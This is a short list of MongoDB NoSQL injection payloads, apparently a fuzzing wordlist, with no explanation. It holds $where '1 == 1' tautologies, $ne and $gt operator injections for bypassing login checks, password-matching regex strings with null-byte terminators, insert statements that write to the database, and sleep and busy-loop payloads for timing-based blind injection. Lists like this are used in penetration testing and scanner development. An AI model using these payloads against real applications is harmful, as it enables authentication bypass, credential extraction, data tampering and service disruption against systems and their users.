true, $where: '1 == 1' 
, $where: '1 == 1' 
$where: '1 == 1' 
', $where: '1 == 1' 
1, $where: '1 == 1' 
{ $ne: 1 } 
', $or: [ {}, { 'a':'a 
' } ], $comment:'successful MongoDB injection' 
db.injection.insert({success:1}); 
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 
|| 1==1 
' && this.password.match(/.*/)//+%00 
' && this.passwordzz.match(/.*/)//+%00 
'%20%26%26%20this.password.match(/.*/)//+%00 
'%20%26%26%20this.passwordzz.match(/.*/)//+%00 
{$gt: ''} 
[$ne]=1 
' } ], $comment:'MangoDB bypassed :D :D ' 
';sleep(3000); 
';sleep(3000);' 
';sleep(3000);+' 
';it=new%20Date();do{pt=new%20Date();}while(pt-it<3000); 
$where: '1 == 1'